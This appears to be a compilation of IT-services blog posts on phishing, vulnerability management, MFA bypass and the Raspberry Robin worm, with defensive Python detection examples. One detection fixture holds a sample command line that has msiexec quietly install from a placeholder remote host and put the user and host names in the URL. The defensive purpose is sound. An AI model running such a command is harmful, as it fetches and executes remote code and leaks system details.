Received a Random Link? DO NOT CLICK ON IT!

If you ever receive a random text or email from PayPal (or any other business, for that matter) telling you that your account has been suspended and that you must authenticate your identity through an unknown link, think twice before clicking on that link. This is a common method that hackers use to break into accounts, and it works on account holders who fall for the phishing scam. There is a better way to investigate the issue: access your account the way you normally would instead of clicking on that link.

If you were in this position, what would you do?

It is pretty safe to say that no one wants to fall for a phishing scam; but, at the same time, it can be very tempting to trust the message to make sure there is nothing wrong with your account.

The best approach is simple, but definitely not one that we would intuitively think to do.

Instead of clicking on the link provided in the text or email, open a new web browser tab and log in to the website the same way you normally would to access your account. The type of account does not matter, whether it is your bank, your favorite online retailer, or any other website you have an account with. Logging into the site directly, rather than using the link given, is simple and easy to do. It will also help keep you from becoming a victim of a phishing attack.

Let Us Help Your Team and Keep Them Safe

4 Corner IT can help you and your company choose the best tools and resources to keep everyone safe from security and phishing attacks. Our professionals can help build your business’ defenses and offer training to all members of your team, including how to identify potential threats and the best practices to keep safe from these attacks. For more information or to get started today, contact us at 954.474.2204.

Enterprise Businesses and Vulnerabilities

It is no secret how vital cybersecurity is for all organizations today. Recent data has shown just how crucial visibility into your company’s infrastructure really is. Today, most businesses have IT solutions to assist with detecting and managing vulnerabilities in their information systems. These vulnerabilities can range from a bug in code that allows hackers to gain access, to a flaw in an update that fixes one vulnerability but causes another. Enterprises face viruses, malware, spam, and phishing schemes. With the number of options available, IT professionals must learn how to manage these vulnerabilities and which types of solutions will best fit the company.

Enterprise Vulnerabilities are Pretty Bad

Sevco Security recently released a report, The State of the Cybersecurity Attack Surface, that gathered data from over 500,000 IT companies. This report found that many of the assets that these businesses relied on were missing critical endpoint protections or lacking critical checkpoints.

Research showed that, of the businesses that were interviewed, 12% of the companies lacked endpoint protection services while 5% lacked enterprise patch management. It was also found that 19% of Windows servers were missing endpoint protections.

These companies also had stale assets: assets that the security control console recognizes and registers as having the tool installed, even though the device is no longer checking back in. Many organizations deal with this issue, as 3% of IT assets showed stale endpoint protections and 1% showed stale patch management. Because these devices appear to be checked out and approved, issues are more difficult to find and resolve before they create problems.
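One way to surface the missing and stale assets described above is to compare an independent inventory against the console's last check-in times. This is an added example, not code from the report or from any product; the hostnames, field layout, and 14-day threshold are assumptions, and the sample data is constructed.

```python
from datetime import datetime, timedelta, timezone

STALE_AFTER = timedelta(days=14)  # assumed threshold; tune to your agents' check-in interval

# Constructed sample data
NOW = datetime(2024, 1, 31, tzinfo=timezone.utc)
INVENTORY = ["WS-001", "ws-002.corp.example", "SRV-DB01", "WS-004"]  # e.g. from directory/DHCP
AGENT_LAST_SEEN = {  # exported from the endpoint-protection console
    "ws-001": NOW - timedelta(days=1),
    "WS-002": NOW - timedelta(days=40),
    "srv-db01.corp.example": NOW - timedelta(hours=2),
}

def norm(hostname):
    """Compare short lowercase names so 'WS-002' matches 'ws-002.corp.example'."""
    return hostname.strip().lower().split(".")[0]

def classify_coverage(inventory, agent_last_seen, now, stale_after=STALE_AFTER):
    """Return {host: 'missing' | 'stale' | 'healthy'} for every inventoried asset."""
    seen = {}
    for host, ts in agent_last_seen.items():
        key = norm(host)
        # Keep the most recent check-in if the console lists a host twice
        seen[key] = max(ts, seen.get(key, ts))
    result = {}
    for host in inventory:
        key = norm(host)
        if key not in seen:
            result[key] = "missing"   # no agent registered at all
        elif now - seen[key] > stale_after:
            result[key] = "stale"     # registered, but not checking back in
        else:
            result[key] = "healthy"
    return result

def summarize(result):
    """Percentage of assets in each state, comparable to the figures quoted above."""
    total = len(result) or 1
    return {state: round(100 * list(result.values()).count(state) / total, 1)
            for state in ("missing", "stale", "healthy")}

if __name__ == "__main__":
    coverage = classify_coverage(INVENTORY, AGENT_LAST_SEEN, NOW)
    print(coverage, summarize(coverage))
```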

IT professionals should conduct proper research on all the available vulnerability management tools to find the appropriate ones to use. It is essential to look for a tool that allows automated scanning, alerting, and tracking of vulnerabilities over time. The tracking helps ensure that these vulnerabilities are patched as soon as possible. Vulnerability management tools should be pretty easy to set up and begin functioning as soon as possible. 

The four critical criteria of vulnerability management, also known as VM, are network discovery, scanning, reporting and correlation, and asset prioritization. It is important to ensure that you have an IT department that will always maintain your company’s infrastructure. If needed, you can also outsource vulnerability management to another IT team that will assist in protecting your organization’s infrastructure.

We Can Help Prevent Your Business from Experiencing These Issues

At AE Technology Group, our remote monitoring and maintenance are created in order to identify and solve IT problems before they can interrupt business operations. For more information or to find out how we can assist your company, contact us today at (516) 536-5006.

Hackers Are Discovering Cracks in Multi-Factor Authentication

Multi-factor authentication, or MFA, is an effective practice in preventing cyberthreats. Unfortunately, and not surprisingly at all, hackers have found a way around MFA. Continue reading to learn how hackers found defects in multi-factor authentication and how to keep you and your company protected.

Why is Multi-Factor Authentication so effective?

The most common method hackers use to gain access to accounts is through phishing scams where they convince users to voluntarily provide login information like passwords and usernames. Although not as common, hackers guess frequently used weak passwords and might be successful. Either way, the secondary credential required by MFA means there is another level of security which helps prevent hackers from accessing accounts and personal information.

How are hackers getting around Multi-Factor Authentication?

Microsoft informed users of the recent attacks that have shown it is possible for hackers to find alternate ways around multi-factor authentication protocols. Hackers do not necessarily break through MFA but they are able to bypass inputting credentials required by MFA.

The most common way of bypassing MFA is through the use of “adversary-in-the-middle” attacks. In this attack, hackers use a phishing scam in tandem with a proxy server between the victim and the service he or she is logging into. Hackers are then able to steal the user’s password and the session cookie. The user is able to gain access to his or her account and has no idea that he or she was just hacked. In reality, the hacker just received access to the user’s account.
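Because the stolen session cookie is later presented by a different client than the one that logged in, a service can look for one session identifier arriving from more than one client. The sketch below is an added example, not from Microsoft or the original post; the event layout, session names, and the /24 (IPv4) and /64 (IPv6) grouping are assumptions, and the log lines are constructed.

```python
import ipaddress

# Constructed sample events: (ISO time, session id, source IP, user agent, action)
EVENTS = [
    ("2024-03-04T09:00:02Z", "sess-a1", "198.51.100.23", "Firefox/123 Windows", "login+mfa"),
    ("2024-03-04T09:00:40Z", "sess-a1", "198.51.100.77", "Firefox/123 Windows", "read_mail"),
    ("2024-03-04T09:06:11Z", "sess-a1", "203.0.113.9", "python-requests/2.31", "change_settings"),
    ("2024-03-04T09:10:00Z", "sess-b2", "192.0.2.50", "Safari/17 macOS", "login+mfa"),
    ("2024-03-04T09:12:30Z", "sess-b2", "192.0.2.50", "Safari/17 macOS", "read_mail"),
]

def client_key(ip, user_agent):
    """Coarse client identity: network prefix plus user agent.

    Grouping by prefix keeps ordinary address changes inside one network
    from being flagged as a different client.
    """
    prefix = 24 if ipaddress.ip_address(ip).version == 4 else 64
    network = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    return (str(network), user_agent)

def find_session_reuse(events):
    """Return {session_id: [events from a client other than the first one seen]}."""
    origin, alerts = {}, {}
    for ts, sid, ip, ua, action in sorted(events):  # ISO timestamps sort chronologically
        key = client_key(ip, ua)
        if sid not in origin:
            origin[sid] = key          # client that established the session
        elif key != origin[sid]:
            alerts.setdefault(sid, []).append((ts, ip, ua, action))
    return alerts

if __name__ == "__main__":
    for sid, hits in find_session_reuse(EVENTS).items():
        print(sid, hits)
```

A change of client within a session is a signal to investigate, not proof of compromise: VPN switches and roaming between networks trigger it too.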

Other methods that are used to work around Multi-Factor Authentication

There are other means that hackers use to bypass multi-factor authentication but it may take time and effort. If a particular system uses SMS messages or email codes and the hacker was able to obtain the user’s login credentials, then the hacker can gain access to the account without having to answer the secondary credential.

Hackers can also bypass MFA by using trojans to spy on users or to take control of certain devices used to authenticate a system. If the account’s login portal depends on something the user knows, such as a code, hackers can attempt to get in.

What is the best approach?

The best defense against hackers and other attacks is to educate people on how hackers work and the most appropriate and effective security solutions to incorporate. It is recommended to implement multi-factor authentication. It is also crucial to teach employees the importance of MFA and other security solutions.

AE Technology Group can help you and your organization implement the best security solutions on the market. We can also provide extensive training and testing for your team to be prepared to handle any and all phishing attacks. To learn more about how we can help your business, contact us today at (516) 536-5006.

The Raspberry Robin Worm

Storage devices, such as USB drives, have been known to spread malware from one device to another. Recent analyses found that an imminent threat, known as the Raspberry Robin worm, is currently developing. What is it and how can you keep yourself and your company safe from attacks?

What is Raspberry Robin?

Raspberry Robin is a worm that was initially discovered in Europe in September 2021 by cybersecurity intelligence analysts at Red Canary. It was found to primarily affect users of Windows operating systems.

What exactly does Raspberry Robin do?

When an infected USB drive is inserted into a computer, the device will display an infected .LNK file. A msiexec process is then started through the command prompt. A .BAT file has two commands that can be executed. One command can manage various Windows features and the other command can configure Open Database Connectivity. The combination of the two will make the threat difficult to locate on the network as it remains hidden.

The Raspberry Robin infection process was found to escalate further where compromised QNAP NAS (Network-Attached Storage) devices are also affected. During this stage, the hacker is able to retrieve the victim’s user and device names, using HTTP requests, once the .LNK file is downloaded. From the infected QNAP device, the malware then utilizes a malicious DLL (Dynamic-Link Library) in order to gain access and take control over the entire system.
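The behaviour described above (msiexec started from the command prompt, with HTTP requests that carry the user and device names) can be turned into a triage rule over process-creation telemetry. This is an added example, not Red Canary's detection or code from the original post; the event fields, hostnames, and scoring are assumptions, and the events are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation events (field names are assumptions)
EVENTS = [
    {"host": "WS-014", "user": "alice", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "mSiExEc /q /i http://nas.example.invalid:8080/aB/WS-014?alice"},
    {"host": "WS-020", "user": "bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'msiexec /i "C:\Installers\viewer.msi"'},
    {"host": "WS-031", "user": "carol", "parent_image": r"C:\Program Files\Mgmt\agent.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /qn /i https://updates.example.invalid/app.msi"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lowercased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()

def check_event(ev):
    """Return a finding for msiexec launched with a remote URL, else None."""
    if basename(ev["image"]) != "msiexec.exe":
        return None
    match = URL_RE.search(ev["command_line"])
    if not match:
        return None  # local package installs are out of scope for this rule
    url = match.group(0)
    reasons = ["msiexec given a remote URL"]
    if basename(ev["parent_image"]) == "cmd.exe":
        reasons.append("parent is cmd.exe")
    # The page describes user and device names being sent in the HTTP request
    leaked = [k for k in ("user", "host") if ev.get(k) and ev[k].lower() in url.lower()]
    if leaked:
        reasons.append("URL carries local " + " and ".join(leaked))
    return {"host": ev["host"], "remote": urlsplit(url).hostname,
            "score": len(reasons), "reasons": reasons}

def triage(events):
    """Findings ordered from most to fewest matching indicators."""
    findings = [f for f in map(check_event, events) if f]
    return sorted(findings, key=lambda f: -f["score"])

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Remote installs launched by a management agent also match the first condition, which is why the score rises only when the parent process and the leaked names agree with the description.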

How does Raspberry Robin spread?

Although it is understood that Raspberry Robin spreads via compromised USB drives, it’s unclear how it spreads from device to device.

What are hackers looking for?

Unfortunately, as with most malware in its initial stages of development, not much is known about Raspberry Robin. More research is required to determine its spreadability and the intention hackers may have had when creating this worm. Although it is currently unknown, it is suspected that hackers developed this attack with the intent to steal data and/or install additional viruses on infected devices.

The Final Takeaway

The way to keep yourself and your business safe from Raspberry Robin is to treat all USB devices with intense scrutiny. This includes not inserting USB drives that do not belong to you or USB devices that might have been found lying around on the ground. It is important to remember that USB drives may not look suspicious from the outside but can be compromised on the inside. Always think twice before plugging any unknown devices into your computers.

AE Technology Group can help your organization keep itself protected from the various and growing threats out there, including this Raspberry Robin worm. Although we’re unable to physically stop your team from inserting potentially infected USB devices, we can provide further education, including the dangers of doing so, as well as training for employees. In addition, we will continuously track your network environment for possible threats. To learn more about how we can keep your business safe, please contact us at (516) 536-5006.

Advanced Technology Cybersecurity Risks and What to Do About It

Cybersecurity for modern businesses is always attempting to stay ahead of increasingly complex security threats from hackers and cybercriminals. Companies will continue to invest in technology to enhance their business. As technology evolves, so do the cybersecurity threats that can infiltrate a business’s network. No company is immune, whether a smaller enterprise or a large government agency, even with today’s security.

The Risks of Modern Technology

Technology such as the Internet of Things (IoT), artificial intelligence, cloud services, and more allows businesses to streamline their processes and accomplish more, efficiently and accurately, in a shorter timeline. With more technology comes greater risk, as cybercriminals consistently innovate and find new ways to steal data from businesses of any size.

Advancements such as automation remove human error and provide a more efficient way of doing business, but it doesn’t come without increased risks. Cybercriminals have highly sophisticated tools and capabilities using the very technology that businesses use to streamline their processes. 

When your business invests in technology, it’s important to invest in robust and aggressive cybersecurity that protects data and your business’s networks. Your cybersecurity practices should be comprehensively reviewed on a regular basis. You want to consider the following:

  • Do your employees have enough training to be an asset rather than a vulnerability?
  • Are the security measures currently in place enough to protect your business against threats and risks? 
  • Is your business prepared and looking ahead at the developing and evolving cyber threats and risks that are likely to emerge with new technologies?

The Current Evolving Threat Landscape

If your business is going to be prepared for advanced threats, it’s important to stay up to date with the current threats that can impact your business. Here are a few ideas on how to protect your business from developing threats.

Malware – Malware is becoming increasingly harder to find. It is getting better at mimicking user behavior and at hiding its actions. To fight this threat, you need to ensure your team is trained to spot malware, or use automated security solutions to help you catch malware before it becomes a major problem.

More Technology Means More Vulnerability – More technology may be beneficial for businesses, but more technology means you have more to protect from attacks. Increased risk management and streamlining technologies to make IT less complex can help protect your business. 

Increase Upper Management Awareness – Often in companies, the upper levels of the corporate hierarchy remain blissfully unaware of security issues and threats because they believe these risks are to be handled by the IT team. Cyber attacks can impact any level of a business, and it’s important to ensure everyone, including high-level executives, has a base awareness of the threats and what to look for.

Need Help Securing Your Business?

Working with us as your managed IT service can help ensure your data is protected against any cybersecurity threat your business may encounter. You can get back to focusing on running your business while we focus on protecting your business from cyber threats. To learn more, give us a call at (516) 536-5006.